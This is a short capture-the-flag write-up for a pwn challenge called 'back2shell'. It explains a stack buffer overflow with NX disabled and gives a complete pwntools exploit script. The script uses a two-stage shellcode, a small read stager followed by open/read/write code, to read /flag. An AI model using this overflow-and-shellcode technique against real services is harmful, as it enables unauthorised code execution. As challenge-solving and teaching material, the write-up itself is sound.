In this challenge, we are given a stack address and there is a buffer overflow vulnerability present. The system does not have NX (No Execute) protection enabled, allowing us to execute shellcode directly on the stack.
However, the challenge has a restriction: we can only read a limited number of bytes directly. Thus, we cannot use the classic method of directly placing our shellcode into the buffer, as the length isn't sufficient. The solution involves leveraging a re-read technique to increase the number of bytes we can read in two stages, then use write-orw to execute the shellcode.
from pwn import * from LibcSearcher import * from ctypes import * io = process('./back2shell') elf = ELF('./back2shell') context(log_level='debug',arch=elf.arch,os=elf.os) #io=remote('hackaday2024-3-pwn-challenge-f6426840d82f82d3.elb.us-west-2.amazonaws.com',9999) libc = elf.libc def debug(): gdb.attach(io,gdbscript="") pause() def get_addr(): return u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) def get_sys(): return libcbase + next(libc.search(b'/bin/sh\x00')), libcbase + libc.sym['system'] r = lambda num : io.recv(num) ru = lambda data : io.recvuntil(data) rl = lambda : io.recvline() s = lambda data : io.send(data) sl = lambda data : io.sendline(data) sla = lambda data,pay : io.sendlineafter(data,pay) uu64 = lambda size : u64(io.recv(size).ljust(8,b'\x00')) uu32 = lambda size : u32(io.recv(size).ljust(4,b'\x00')) itr = lambda : io.interactive() li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m') ru("Helloworld!!! Welcome to my challenge!\n") stack = int(r(14),16) + 0x40 li(hex(stack)) shellcode = asm(f''' xor esi,esi mov rdx,0x100 xor eax,eax mov rsi,{stack} syscall ''') #debug() pay = b'a'*(0x10+2) + p64(stack) + shellcode s(pay) sleep(0.1) #pause() pay = b'\x90'*0x20 + asm(shellcraft.open("/flag")+ shellcraft.read(3,stack+0x200,0x50)+ shellcraft.write(1,stack+0x200,0x50)) s(pay) #sl("cat /f*") itr()